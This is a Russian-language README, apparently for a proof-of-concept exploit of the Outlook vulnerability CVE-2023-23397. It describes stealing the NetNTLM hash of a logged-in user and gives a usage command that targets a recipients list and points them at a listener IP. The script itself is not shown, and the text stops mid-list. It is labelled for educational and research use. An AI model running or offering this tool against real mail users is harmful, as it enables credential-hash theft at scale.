
Подтверждение концепции CVE-2023-23397 для уязвимого клиентского приложения Microsoft Outlook.
Доказательство работоспособности CVE-2023-23397 для уязвимого клиентского приложения Microsoft Outlook. Только для образовательных и исследовательских целей.
Эта CVE направлена на получение хэша NetNTLM вошедшего в систему пользователя из клиента Microsoft Outlook версии 2016, за исключением последней исправленной версии.
python3 exploit.py -p 192.168.0.5 -f recipients.txt
Меню помощи с описанием.
python3 exploit.py -h
Эксплоит был написан для массового тестирования доставки и работает с вероятностью 50/50. Это связано с тем, что библиотека Python independentsoft.msg для создания встречи и объектов для Outlook прикрепляет файл как сообщение, и MS Outlook распознает его не как родной. Вот почему получение хэша не всегда завершается успешно.
Во время тестирования я столкнулся с некоторыми техническими проблемами и ограничениями. А именно: